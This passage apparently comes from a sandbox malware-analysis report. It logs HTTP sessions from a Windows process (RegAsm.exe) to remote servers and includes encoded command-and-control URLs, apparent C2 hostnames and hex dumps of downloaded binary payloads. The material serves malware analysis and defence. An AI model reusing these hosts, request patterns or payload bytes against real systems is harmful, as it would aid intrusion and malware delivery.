Jan 12, 2022 13:02:05.378916979 CET	1269	IN	Data Raw: 1b 77 cc f6 4e 95 10 c1 bb 15 03 a1 e0 85 33 43 81 e0 ab de 69 70 39 2a e7 3c 48 c2 36 14 48 a5 bf 88 a0 75 71 25 92 a4 e5 91 98 70 7d 49 0d d7 9b 73 23 43 16 01 79 0e 9d 5d 19 af 92 92 c0 1d 5d 8f d5 97 5a bd 34 a3 8a 78 09 48 5a 28 e4 5a f0 2a Data Ascii: wN3Cip9<H6Huq%p}Is#Cy]]Z4xHZ(Zg\|;{<-L\gjod$)vcB+B5B4;t.3Jwb*-rz^sDssj?C}(#X$xcxkT){W}TC<~xl.^
Jan 12, 2022 13:02:05.378962040 CET	1271	IN	Data Raw: 97 34 0d 6c 36 81 ba 61 8e 84 26 e7 c5 1d 3d 5a 0b 14 a9 7a 8e 1b ac 2c 06 35 59 f4 4b 8f 04 1f e8 8b 3f 23 46 29 43 8f 45 e5 a4 ce e1 fb 24 f3 e7 bf 98 f4 9a 6f c9 15 0e 32 21 cb 2a 5b 1a d7 d9 5a 14 23 95 63 7c 58 40 72 fa 0b bd 32 c4 93 e0 31 Data Ascii: 4l6a&=Zz,5YK?#F)CE$o2!*[Z#c\|X@r21`+W:h?lE{1Z>EfDl-YHjiI/5\\|PT.S0$$35I4kfoEO?4pQiu.#0\|\|)j)Mn[l5]a1
Jan 12, 2022 13:02:05.379106045 CET	1272	IN	Data Raw: 37 75 da 35 bb 0a c0 d8 81 5d 1d 8f 9b 4f 5f c4 92 1a 02 a4 c9 c3 60 1a c8 e1 5e af 19 60 9f 02 5f 8d 39 37 10 89 cd 46 b1 86 8a 82 c6 47 59 2e 4e c3 52 be 0e 13 4f 8f 03 b3 cf 66 8c 89 88 6c 34 a7 f4 44 4a f1 d6 3d 8f dc 53 1c be 39 98 eb b0 6b Data Ascii: 7u5]O_`^`_97FGY.NROfl4DJ=S9kPIm,pne^h\|tT`cHTax-Qs_9&?7cg%jGu8\|I1kI[X\?BK\|\|R\i/-hKeX
Jan 12, 2022 13:02:05.379267931 CET	1273	IN	Data Raw: 6e f6 95 e3 c5 8e 07 f6 b2 78 4a 9a 0c 6e f5 a8 d7 93 ba 06 e1 15 03 94 d2 a3 e7 e0 e6 99 f1 49 3e cf 78 cc 57 4f 5d 70 bd ea e3 2d f1 db 96 21 41 d4 3a b2 42 e0 8b c2 81 26 11 8f 87 65 91 5d e1 40 54 30 26 67 1b de 29 8c 93 29 88 0a 63 84 63 f9 Data Ascii: nxJnI>xWO]p-!A:B&e]@T0&g))cchX/K0zF+ESaX"F"2)M4=K(R%@o r5GH"52JG2I,kU#RxW`MYnSush&P
Jan 12, 2022 13:02:05.379314899 CET	1275	IN	Data Raw: b5 ad dd 46 85 f9 97 36 19 c9 38 f7 fd f2 5b f8 f1 73 ba ba 13 ed 58 9c 19 7c 66 66 d8 b6 05 0d f4 e8 53 b3 f6 19 fe 22 dc bc f4 48 53 e4 e9 e0 cf fe 59 26 d8 ad 74 6a b6 b0 73 2e 93 d4 65 1a ac e3 a6 32 c9 96 17 08 16 1a 9d 06 e1 94 65 cf d1 70 Data Ascii: F68[sX\|ffS"HSY&tjs.e2ep8lGN`B?Nw]"-EXD.*YiwskW+/)jW{&2@%~~p.)azb,Qe2=bA/q<^I.:oJ(ZkL}sE
Jan 12, 2022 13:02:05.379468918 CET	1276	IN	Data Raw: a4 0f ab e6 60 c3 fb 98 66 45 85 a2 17 5d 94 6e 35 3e 6b 7f 83 69 55 55 63 dd 8d 9b 62 9b 79 39 93 03 27 3b f7 29 c0 86 8c ef e8 31 59 69 89 81 d9 82 c3 c8 15 78 67 35 18 f4 e7 6c c6 7b c2 9f e0 33 5c 6f da ab 33 eb 3b 7d 04 df 46 12 e7 d3 e2 53 Data Ascii: `fE]n5>kiUUcby9';)1Yixg5l{3\o3;}FSn3ege$>J@3]YSshKup"!fr,p[\|6"5S2RGX/<ndIj{p]%{#jA1L*bMARXxdg=
Jan 12, 2022 13:02:05.379532099 CET	1278	IN	Data Raw: d4 11 b3 49 3c 1f d6 3f 18 db 4a 2e f9 bb 13 c7 38 56 5f 05 e3 84 4c 7f a1 f4 4d ba 41 18 08 23 e9 5a 9f 2e a3 ab 86 68 b4 39 c8 a1 43 19 ef 70 f4 68 c1 b5 cc 36 f0 cb ce 9f d9 25 50 f3 43 03 5b 84 40 4a ee 9b e9 68 9a 08 75 e5 07 d7 19 58 59 f8 Data Ascii: I<?J.8V_LMA#Z.h9Cph6%PC[@JhuXY=CvA`>yF;<JsU2]X1K)$pc%=@*teE\|>0lRfpM+FHH85=W]1{S/kkjORNO-7%7#YD
Jan 12, 2022 13:02:05.387175083 CET	1279	IN	Data Raw: 50 79 38 11 f0 b6 8b 3b a2 57 12 a9 c3 74 dd 8d d6 d6 6e 03 3c db 1d fe d6 7d 12 81 b8 dd c5 65 0a fc b9 36 e7 3f b1 0b cc 70 eb fc c9 2d da ed d7 42 ff 77 3c 35 87 8e ff 85 02 0a 8e 06 73 55 8f 91 7b 73 12 99 0e 13 50 f0 4b a1 3c 2f 16 f6 8e 11 Data Ascii: Py8;Wtn<}e6?p-Bw<5sU{sPK</ei{uO}F`&HZ]%d+`n8r-ESp61n[T*(y$(2Uc+wCGQBE:,hz[UpI<E'-9_>V
Jan 12, 2022 13:02:05.431318998 CET	1280	IN	Data Raw: 6e a6 a3 40 56 6e b8 c5 a0 0e 77 55 64 af f8 02 9a fb c3 8a bf 2c 1d 08 2f 20 73 0f 2b 96 f4 67 c4 cc 05 8d 05 9d 5a 82 c4 8e 7c f1 63 0b ce 62 0f 49 9e c1 c9 e8 7d 17 95 b1 25 17 5c 0e 3f 50 67 be 96 62 60 93 e6 d6 cc e5 79 23 bd e2 f5 5f b4 cb Data Ascii: n@VnwUd,/ s+gZ\|cbI}%\?Pgb`y#_\|QfQtnP_+%!>QrF\|K#_\|&6dfxR<K1>'$<"FP"AJe}j/e,\|?9&<gS ^b$@V

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49752	185.189.12.123	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	kBytes transferred	Direction	Data
Jan 12, 2022 13:02:06.347887993 CET	1474	OUT	GET /g37w_2FYO/KW18Y37P4Dg_2F1TMh_2/FK2ujRayUy6lspI6qOC/AgWOSVQoUjByibFH6VxOps/v3Ehdrv875bm_/2Bs0w7UO/8HLDir_2FrS7hQvf7_2F_2F/dRVLAAfuPh/m30EKXD6FtreycZoi/lobTM_2FcJdc/YK8geqpXCxP/dDLbqs1jlQyVsA/bp_2Fxijgc04UGfwb6H7A/hHd5lPMnnVOlY1xb/cpTKFIgzAGJyGab/7_2BPVHreJHJUQdZTy/CjJC9x69g/tFYle1uxB8JrgYxIiF_2/BMgOKImH_2BEsdbiTm7/xqsfHc14yTZglOas0gOCoM/8tPVx3GttAeuK/bZvFimTpFp_2B/LS HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:95.0) Gecko/20100101 Firefox/95.0 Host: apr.intooltak.com
Jan 12, 2022 13:02:06.844825029 CET	1475	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 12 Jan 2022 12:02:06 GMT Content-Type: application/octet-stream Content-Length: 248464 Connection: close Pragma: public Accept-Ranges: bytes Expires: 0 Cache-Control: must-revalidate, post-check=0, pre-check=0 Content-Disposition: inline; filename="61dec33ec6334.bin" Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Data Raw: b3 98 1a ae 8e 45 b2 4e db a3 ce 71 b5 85 77 8c 91 9f c2 9d c9 5b 36 f6 29 9f 48 4f 4f b3 0a 86 ae b6 77 4b 5c 10 0b 24 51 3d 13 e0 4d a3 4a 7c 81 0e 51 46 a0 69 89 3e 28 b8 fa 30 0e cf 48 1a d8 48 1d 2d 12 0a 45 64 7e 20 69 02 18 e7 78 21 62 0d e7 2d 14 4a 54 12 e7 90 83 e9 05 f1 24 5f 24 56 ae 85 99 81 1b 75 28 5d 67 92 a6 e6 6a 63 6b 35 18 22 2f 22 5c 96 cb 50 e5 7c 78 36 ac 01 d3 42 2c 23 4b 03 b2 7d 39 3e 30 51 4a 86 21 e2 4d ec 67 bf 8d 0a 7b 19 f3 6e 0e 52 7e fd 1c 62 8e a7 ba e3 e9 f7 b2 a9 f3 4d ce 87 45 15 e6 ae f4 40 f1 6f de 98 88 8c 76 d3 31 05 fc 1c 79 01 0b 29 93 ae ea 8d 86 11 3c d0 ea 63 84 8d 3b 6a d0 c7 df 3f 07 2f cb b9 33 f5 b8 2e 83 c8 f5 1f 76 86 6c 89 86 bd 44 d9 bd 53 d4 e7 50 d9 fa 75 23 47 54 ee 0b 5c 43 dd 6a 2d 10 5a bb 41 e1 34 bf 09 0a c1 73 4e 05 1f 6b de 6f ed d5 05 81 28 35 84 ee 44 fe a2 cb c3 b7 0d b1 33 68 4b 83 c6 9e 91 ef ed 9c 20 d6 45 d7 37 cc a5 d3 16 d7 3e 90 62 35 4f 09 03 a2 c1 92 a3 81 3b 7d e7 85 7a e6 21 19 c6 5f a1 61 fb ab 86 a0 6f 15 2c 04 8b a9 ed ef 9f 6b 26 ee 62 50 88 99 af 52 3a 98 33 df 5a 0d af c6 58 30 7b 3d 77 5c 14 c3 04 6e 82 f8 9f ea 4c 52 80 a4 c3 85 ba 32 45 20 8e f2 3a 17 87 3e a2 c7 07 d3 d7 a7 a4 4b 54 d7 98 7e 2b c7 5a 41 b6 d2 32 dc cc 70 01 e9 af 09 e1 eb 1d 92 dc b9 9b d5 e1 d0 44 d2 c7 6e 2a d0 89 f4 d7 bb b1 d7 de a8 56 60 b4 a0 7f a7 a3 da a4 76 a7 04 82 d1 40 37 55 cd ff 73 ec a0 8f ae 2e cf 2e d5 ba d9 c5 ed 57 d9 e1 18 d0 33 44 f4 ed 0d 7a f0 8e 88 7c 7c 8b a5 84 9a d1 9b 70 9a 71 3d 69 db 56 7d 46 18 bc ac 26 f0 26 14 70 9d bb ea 6a 6e 0c e7 a8 e6 94 d9 57 e8 0e e9 40 91 9d 81 60 fc 55 b7 69 0e 97 fd a4 22 c1 cb e3 4f 95 3b a3 f1 ff a6 1e 8f 84 10 54 ee b8 0c 16 65 e5 61 1d 4a bc 81 62 b0 0c 19 ab 3e 58 14 fb 24 bc 30 5b 7b 55 a3 55 01 18 15 a5 cb 7e 37 a7 58 b8 4e 8c d6 9f 9c c1 76 b0 ac 96 1a 01 9f ac 88 df f2 7c 05 c4 ae d8 ef ad de 11 3a f6 ed aa a3 2b 53 e1 eb 6e ea 14 ee 4a 7d f3 c7 af b1 ac bc 9f 1a 2e 4a 5c 81 e8 1c 49 8a 57 69 47 86 ce 9f 3f 83 b0 30 21 b7 59 f4 6a 44 e2 32 e0 f5 28 4b 55 f2 ef b9 41 f6 cb 96 d4 9a 08 bf fb 0f 06 c1 7f 72 6c 62 48 7b f8 95 79 fb fd 95 ba 7b 23 f1 45 b8 a0 47 b8 a3 a7 fb f0 6d 29 da 5d 81 08 2d 4b 56 a8 20 6f ea 78 ce d2 dd cb 82 85 33 25 d1 62 67 32 35 01 51 53 05 48 ae 57 c6 f0 d8 0f b3 16 a1 66 fb a4 dd d0 22 26 ae 16 56 84 14 3c 97 ab ba 78 d6 b6 b2 1c a5 9a b8 e3 73 d4 c7 6b 4d 28 a6 71 85 76 5d 60 13 f5 9c 36 f1 87 5f ba 09 ab 83 9f ef 9e 30 33 9a 5b 46 7e a6 c0 6b 64 0a 37 71 4e 29 f1 06 83 76 7b e9 86 cb 0d 65 86 dc a5 de 1b 8a 69 21 1e 0c ff 7c 66 c4 5b cb d4 a1 1a 5e f8 56 19 d6 bd 3d 61 86 34 2f d8 6d ff 27 07 79 32 86 ad f1 30 dd 6c 45 d4 34 5e 8b 31 3c 13 bf 63 7e 26 f5 20 f3 d7 f0 71 4a a0 a1 37 2a 56 bf 9a 17 ac f4 18 b9 2d 28 7c 17 ae 4f 5d 36 68 26 b3 46 65 4e aa 8c 10 a2 Data Ascii: ENqw[6)HOOwK\$Q=MJ\|QFi>(0HH-Ed~ ix!b-JT$_$Vu(]gjck5"/"\P\|x6B,#K}9>0QJ!Mg{nR~bME@ov1y)<c;j?/3.vlDSPu#GT\Cj-ZA4sNko(5D3hK E7>b5O;}z!_ao,k&bPR:3ZX0{=w\nLR2E :>KT~+ZA2pDnV`v@7Us..W3Dz\|\|pq=iV}F&&pjnW@`Ui"O;TeaJb>X$0[{UU~7XNv\|:+SnJ}.J\IWiG?0!YjD2(KUArlbH{y{#EGm)]-KV ox3%bg25QSHWf"&V<xskM(qv]`6_03[F~kd7qN)v{ei!\|f[^V=a4/m'y20lE4^1<c~& qJ7V-(\|O]6h&FeN
Jan 12, 2022 13:02:06.845170975 CET	1477	IN	Data Raw: 18 06 e3 80 75 f9 83 1d f9 96 d7 27 9e 17 0a 22 cd 63 be 84 55 5c 40 4b 1b 94 61 d5 af 0b ae 60 f8 b8 ea e7 98 95 74 53 4f 39 d1 b4 ad 57 61 5f 2c c2 f9 9d 0a 2b e4 ac e9 65 55 84 ac a6 ee dd 64 cf 1c 14 11 e2 14 28 62 10 97 e1 0c dd cf 7d f9 d4 Data Ascii: u'"cU\@Ka`tSO9Wa_,+eUd(b}ILA<pH8A_a6<z$P$\|gJ;+VFgA K7I$0&hE@*#[">faV+dF^cCL
Jan 12, 2022 13:02:06.845259905 CET	1478	IN	Data Raw: c1 dc 2f 67 f6 aa 53 08 c7 a1 75 79 54 23 b0 f6 4a 55 dc 4e 8a b8 2f 48 83 5e 62 11 20 34 d5 22 88 88 ac 2f 6c 56 7f 42 91 17 68 eb 10 da 31 d5 cc c2 cc 87 93 82 72 f1 44 e2 e8 5f f3 f2 ad 5d 0d 18 6c 6d 5f 7f 25 bc b6 a0 c3 0c 2b 16 41 0a ce 83 Data Ascii: /gSuyT#JUN/H^b 4"/lVBh1rD_]lm_%+A&!m/4=C1@*Yr)Q\|([7q8KU0I?S33`\g0+RhHSG;gKpbt(tuDK!/Rc
Jan 12, 2022 13:02:06.845300913 CET	1480	IN	Data Raw: 96 f3 75 7b 82 3c 7e 77 77 0b 86 67 92 e9 ad 45 fc 95 4d 65 12 85 60 1d bc 0c eb bf eb 75 15 0a 7c 96 dc 7c 87 e0 6d 83 8d 97 a1 91 e8 5f 73 c2 2e 7e fd 4a a9 3b 5f da 14 62 f2 36 69 02 d3 1d 4a f5 54 32 32 05 a3 b7 c8 b3 ca 6e 9c a1 84 a1 a1 31 Data Ascii: u{<~wwgEMe`u\|\|m_s.~J;_b6iJT22n1luF0nZY;xEXqefVd:>x+n0PVe6]1mO@[4%Ex}mm9%wB)k>e~f#A
Jan 12, 2022 13:02:06.845434904 CET	1481	IN	Data Raw: d9 cb bb 88 1d 6e 00 b3 23 71 df 58 53 42 c3 1e 51 15 b4 13 9a f3 3b 91 cb 9b ea da f5 3c ba a6 e6 26 76 4b 3b 74 10 bb 86 d0 c7 53 06 ce 77 8a eb 2a f3 cb 9a 92 66 fd 69 26 d5 b6 0e 7c af 8e f9 e0 ea ab 18 22 5d b2 6c d3 f6 a4 8d f7 af ec 62 4b Data Ascii: n#qXSBQ;<&vK;tSw*fi&\|"]lbK,#\3&[\|4<d~3~TZL>\ESR+O`d\|&cYo!l~lr.mJ3sJS/_9Y^%'zE;7'$9p>7L@_2H%j0
Jan 12, 2022 13:02:06.845561028 CET	1482	IN	Data Raw: 74 7a 38 1e 9f cd be 8b fc c3 7d 2a 0c 55 c0 1d 5c 92 cc e2 f4 c0 62 87 78 3d 80 50 1f 1b 3b 8f 1e ea f2 7e f0 98 06 82 e3 54 0f 8f 26 59 68 75 ca 74 1c ec 9d 9a 18 ea 90 8d 83 8d 33 ed 47 64 dd 1d bd 7d 72 5a 39 67 1b 1c 75 e9 52 f6 31 c7 75 96 Data Ascii: tz8}U\bx=P;~T&Yhut3Gd}rZ9guR1uGQ}eFh;vk4&^mGu]F}F:zCG+q"h@liX6;( rt;fttycIA>sQ[&Xwe4;)0{S]9
Jan 12, 2022 13:02:06.846254110 CET	1484	IN	Data Raw: 60 28 45 a3 f9 68 90 f0 3e 75 20 3b 40 2c 39 1f e1 a9 4e 05 a1 34 5f f5 98 d9 3c ba 2a 9f db a7 93 64 59 5b 58 ff ae e0 af fa 9b 52 0b 66 af 53 26 5a f6 78 1d ae a6 8d 3d ed b0 3d 22 e0 16 93 d2 b3 c6 fc fb 45 1b 7d 54 76 95 dc a7 98 7b f6 0f d2 Data Ascii: `(Eh>u ;@,9N4_<*dY[XRfS&Zx=="E}Tv{d;f(~uE:Zp:-jwvy)/gD0`~E(v/p9UL_N# WGYXr1I2f\|e/be"gJ&3
Jan 12, 2022 13:02:06.846323013 CET	1485	IN	Data Raw: 98 a1 8e 9e 0f de 61 02 1c 8e dd 2d fd 1b 50 12 0a 23 80 10 a7 a2 b3 d3 91 ad c9 9e 0b 7e 66 42 96 a0 69 69 aa ce 8e c2 38 bc f6 20 0b 7f 5b 5a 73 71 fa 98 88 7b 02 88 d6 e2 f6 09 9e 6f 65 07 20 b4 d5 6b 3a 83 c7 78 0d 9f 0f 19 c2 b0 0a 07 fb 7d Data Ascii: a-P#~fBii8 [Zsq{oe k:x}71JW2:LA-Tt~KF5K\|^7}R;^m]TMv`[s+MKvVG_#>?$N!,f1 8X
Jan 12, 2022 13:02:06.846363068 CET	1487	IN	Data Raw: 46 66 33 70 69 30 c9 a0 6f 0a 8a b8 9e 99 b4 45 45 a0 24 c5 28 bc 62 b5 6f e2 7c c6 17 3b d7 72 6d 2a f2 e5 a6 27 b6 27 13 0e cf ed c2 1c 7c 0c bf 01 cf 92 3f 21 ee d0 02 6d fc d7 73 8f 5c 97 90 e1 bf 1b 99 dd 0b 40 23 a2 9c 9c b9 98 2d 89 2e 6e Data Ascii: Ff3pi0oEE$(bo\|;rm''\|?!ms\@#-.n1BZE`utO2EPUtP-VHSD=ZiA-[I\|"e~r']J"Y+G%K"Da3N1Hz+}qD!!!,I%(8~Kl
Jan 12, 2022 13:02:06.846580982 CET	1488	IN	Data Raw: 19 be f2 4b fb e5 ac 23 2a 75 40 4d 36 9d 17 4f 87 93 4d 96 c5 e1 b6 12 30 3b 44 b5 50 82 aa ac 31 34 7b fc 1d 2d cf 29 f0 9c 65 b8 aa d5 6e c0 58 4b 16 62 22 40 b7 1e 91 c9 a4 42 28 17 aa 2e f9 c5 45 ac 1d 21 c5 0f 0f 6f 6a 30 60 f3 c5 9d e0 14 Data Ascii: K#u@M6OM0;DP14{-)enXKb"@B(.E!oj0`V8AJd~LzZ~,T@"WOX6!ZUBDVu6 I6wD@&xF!3eK)1?\1265Rn$LW'BChd7Z<tZ3x;
Jan 12, 2022 13:02:06.898086071 CET	1489	IN	Data Raw: f7 b2 55 e9 10 8b f3 c4 b8 e8 99 8b 00 65 84 b0 9c 47 80 9b 67 05 16 0e b7 0f 86 b8 86 e6 a1 3b 9f 1c 27 b8 c3 ef 52 6d ae 60 1f 7d 44 84 27 12 b3 9b e6 49 89 9d aa 2f 79 93 83 bb a7 c4 da 24 b0 4b 9a 87 f6 32 c2 68 98 42 82 d4 3c e4 66 a2 ff 3f Data Ascii: UeGg;'Rm`}D'I/y$K2hB<f?+LV4vUk2T=iZo_Fh< G<,aE+<B'4a\|Oju.>N/2_'ge%s%_LYLc2c),ba>mr.3N6X+5_axoS172EUl!x>@6

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49754	185.189.12.123	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	kBytes transferred	Direction	Data
Jan 12, 2022 13:02:08.088711023 CET	1749	OUT	GET /lnhNHa_2Btty8CaNj/2ZI6TN22qvUD/8ZPV4upYsm_/2FN7_2B_2BUcD0/ieoqnU4qUIxSEwBSHp3U9/VTOicK4Dg9CvfDD5/DOzqkKaYmXyqB_2/BBeVS9VS7cZ_2Bxp8N/QUqIP2qoG/d9YX0YxhQ9wrMxFsIM3_/2FpgIEySH_2F7iIla7P/RVB1W1dWGnBa303ekXLbS2/H9XWbOoIqxvpR/Y0oANlOz/wA_2FDoUg6f5pt9sPS8pXWN/S8nUx2g1cV/w178G4jzQvTUGix2J/FRZXUdQwbPuV/iCh6boYFIAo/eBnDiqYSbaisXu/CvhfCnnlGNsLFuBfY6dkH/EJQ5NM_2B10n/nvc8N HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:95.0) Gecko/20100101 Firefox/95.0 Host: apr.intooltak.com
Jan 12, 2022 13:02:08.576595068 CET	1750	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 12 Jan 2022 12:02:08 GMT Content-Type: application/octet-stream Content-Length: 1761 Connection: close Pragma: public Accept-Ranges: bytes Expires: 0 Cache-Control: must-revalidate, post-check=0, pre-check=0 Content-Disposition: inline; filename="61dec340826f9.bin" Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Data Raw: 16 44 6a 53 43 2b 9a 0e fa 88 9a 94 60 9e 24 04 f0 ea ad 29 22 d3 11 a3 80 99 a9 a3 60 3e b3 10 59 84 97 dd 44 64 2d 69 a4 1e 1f 6a 7e d1 56 8c 27 4c b5 16 4a 55 db dd 5d 8f 51 26 17 e3 ce 7e 15 9b be 23 20 12 ab 67 fc df ec 84 24 f4 41 a4 11 7a 1f b3 ce 55 0d cc 04 84 bb 29 08 0a 00 45 31 15 5f 92 f6 7c 8b 37 d5 9e e6 23 17 e9 6a 34 56 88 9d f7 9c 50 e8 15 ac 93 c3 94 11 08 ce 45 1a 0d 53 6f 14 99 57 8a 7f 24 49 81 94 e7 ba e0 4b 6f 49 42 0d c3 bd ee 7a 30 84 19 06 0c e7 b1 b3 d8 51 32 91 f6 62 f1 08 6d 25 37 e2 22 e0 2c c9 02 e3 b9 2f cc 89 18 c6 14 79 2e d4 a6 64 cf b8 fb 31 91 51 ed f9 0a cd 56 ef 6d 57 f9 b2 42 5f cd 6c f6 b8 f4 77 ca 79 1c 2e 79 b6 f3 e0 e7 c8 a7 a8 8a 59 86 7d cb 62 03 1f 16 77 9e 86 a3 aa 9b 6a 1c 94 3d a4 38 3a 9e 92 20 c4 2b 76 15 d8 ad 53 44 f4 af 3d e4 a7 2a 8c 09 89 71 ec dc 81 04 0f 9f e9 1a 39 14 79 42 16 95 08 d2 3f 69 94 7a b9 73 db ac 7d 64 98 b5 e9 32 e2 2e 60 66 90 ff 32 b0 85 ab 4f 23 63 09 4a cf 31 03 32 b8 c2 42 6c 21 1c 65 97 16 9a 50 31 aa 89 d0 8c ba 82 3b ff 1c d1 88 e5 b6 7a c4 ce 0c df 4f 1c eb 3b 52 d8 92 5a 8e f0 43 2f df 06 68 a8 cd 65 9b eb 36 eb ac 2e ed e4 f5 81 f8 be 3d 9b c0 b3 ae dd d5 c1 fd 00 a6 ae f4 23 ff e0 f8 ff 38 90 a6 9b ba 70 2d 91 e2 23 27 a0 92 5e 3e 2a a1 54 48 07 be 38 e8 cb 00 aa 10 cc 6d 03 1f 94 95 00 f1 65 df 19 47 f3 1f 5f cd 9c 2d 81 34 fd b0 fe a3 ee c0 f3 60 f3 02 e2 5c da 50 6a 77 94 97 fc b7 cf 06 d2 b1 90 be 67 06 cb 62 58 45 7c c3 22 4f 55 96 d0 18 58 ab 2a fb fe 4d 67 c8 d3 56 b8 cd d0 94 cd 6b c8 7c fc 80 f4 1f ab 70 fa 93 48 4d c0 e5 67 f5 57 07 45 cd 8b 87 fb 96 80 e9 ba b1 3f d1 a6 30 d1 2e a7 63 48 20 4f 74 7d 43 38 25 19 90 e4 fc 78 94 ee 1e e8 c1 16 f4 80 70 8d 5a 0a c2 e8 d1 22 d1 d2 bb fe 52 37 d4 5d 7e 60 0f f1 b4 4a 03 cb f7 3e 92 f2 9a 93 8e af b5 5f 14 3b cd 54 90 aa ee 17 3d 6b a3 ea 2d 76 e0 3b 6b 8c ba 6f 51 35 72 fb db 0d a5 5b 91 50 26 05 8c 96 b7 d1 e8 15 26 6e 5a b6 05 46 99 43 65 7b ff 27 c7 2f d2 07 a9 72 5f 7d 00 b5 1a 98 ee b5 e0 2e 61 eb 27 a6 c0 53 ad 1d cc af d6 b1 78 78 c4 60 57 aa ed d7 44 de 75 89 1b b5 16 40 d7 f6 5a 55 f1 a1 da ca 8c e4 98 6b 79 78 4e 1a ae fb cf 3a fb 97 3c 30 1a e3 6e 0c 8a 51 14 ca fc 7e 06 0f 81 7f a0 cc 64 37 c4 dd 3b 8b c0 24 17 a7 31 c9 5c 02 37 a3 ce 6e 71 7e b0 66 c3 75 51 5d 04 90 da d6 d6 3a 85 51 eb 09 d1 d3 aa 27 87 7e 52 10 ea 04 cb 1b d7 6b 19 55 c4 2e ab 88 73 c6 b2 ba d1 75 1d 80 27 68 06 86 6f c2 0b 93 a4 4e 42 4c d0 2f 01 2a e7 a8 1e 64 77 91 a4 88 1f 5f 5c dc 53 18 e1 21 35 87 90 c6 e0 23 92 82 60 7f 99 ff 1c 28 33 a8 e8 65 68 cd 2c 32 7e af 33 49 6f a2 a8 ac 38 f8 ff c8 f6 50 29 43 19 e4 e7 42 ba aa 9e e6 fa 00 bb 57 4c 1e 3d f8 11 50 2c 07 c2 fb 7f d3 21 3b df bb 7b a4 f5 d0 07 99 c2 86 46 e9 bd 2f 06 3b c3 a4 ea 41 bb 67 57 2a ba cf a2 4a c1 08 6b 88 b5 c6 59 2d Data Ascii: DjSC+`$)"`>YDd-ij~V'LJU]Q&~# g$AzU)E1_\|7#j4VPESoW$IKoIBz0Q2bm%7",/y.d1QVmWB_lwy.yY}bwj=8: +vSD=q9yB?izs}d2.`f2O#cJ12Bl!eP1;zO;RZC/he6.=#8p-#'^>TH8meG_-4`\PjwgbXE\|"OUXMgVk\|pHMgWE?0.cH Ot}C8%xpZ"R7]~`J>_;T=k-v;koQ5r[P&&nZFCe{'/r_}.a'Sxx`WDu@ZUkyxN:<0nQ~d7;$1\7nq~fuQ]:Q'~RkU.su'hoNBL/dw_\S!5#`(3eh,2~3Io8P)CBWL=P,!;{F/;AgW*JkY-
Jan 12, 2022 13:02:08.576649904 CET	1751	IN	Data Raw: af 8a 38 bc bc 90 b6 95 44 91 6b 67 c9 66 ec 78 25 9d d5 27 39 cc 4f 6e ba ce 38 86 60 c9 f2 5a 5d 54 7f d2 7d 2f 3c 45 d1 65 f9 85 a7 b1 c7 57 64 2c da b8 df 9a 10 63 42 2a 40 a4 ad be ed 6f aa e7 d6 45 41 2b 5f 7a f0 23 1d 68 95 4f a6 20 4a 82 Data Ascii: 8Dkgfx%'9On8`Z]T}/<EeWd,cB@oEA+_z#hO J`NsZ4Vn?=]`.4 Co 6Y[b1\|ScN6GLWX\-*@Y t,7\|>"-NONL)"^O'y/Ih$rU

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.3	49820	185.189.12.123	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	kBytes transferred	Direction	Data
Jan 12, 2022 13:04:09.103338957 CET	11154	OUT	GET /cG9R2yLu/hwY1VC7UV0FGuTFHUDuWv94/dWPB0qINsS/UcOtH5ibuFGkRtRRz/TcTs3WrbL3kk/KH9_2B01P5_/2BqOCU5VAuO8RX/tDtOsh5JefONIGFgJjwJW/WTNQ_2BigLNUfSTv/vEQOtss42jXAD7m/Vb_2FBrZFcmnzVx4eL/FgvV_2F2J/WJxkKD87XHV59J1BIptx/grHAayUrM6ZXOpWMd4b/m8CaZcQ61hUgT0Er2sN6yR/jqxJkoogaoGBQ/oxZTsR50/IU6qlhp0LlHnTmpxFkzazjn/ZXLdcjlESY/R9eDED1XHAy_2FpXA/QYirrLarjNjS/_2Faftuam8rF_2F/1Ew HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: io.immontyr.com
Jan 12, 2022 13:04:09.595227957 CET	11155	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 12 Jan 2022 12:04:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.3	49822	185.189.12.123	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	kBytes transferred	Direction	Data
Jan 12, 2022 13:04:10.510874987 CET	11162	OUT	POST /NmtPFuQd_2/BfdLYLn2BLCtH1Hsh/hg_2FVLDGfIg/gtHnWY07UvK/_2FGfiZdkTNp3n/qSVe2e02NbQuSngndCWZx/FHtx2JyPoVSWyJAF/Nf3MxwobjdKHeJw/QN32g1hXKaTKdLZpGQ/1rai86tHa/cARCkcyc0ZIXwpr6o7hy/9LscnpzGSQw_2BN65St/d5vH28LuyC5fwk6W58_2BJ/mW_2BjaYyboIc/4qfAAbea/H6DnQT_2FBDJuaMwLw_2Bis/Q5vm9_2Bsb/WNMn_2Bg9zRAyx8QD/EwO5ty_2BWJe/AeEgVlXP8KP/mEQSv1dRw/v0fxMe2Myiu1T/e HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Content-Length: 2 Host: io.immontyr.com
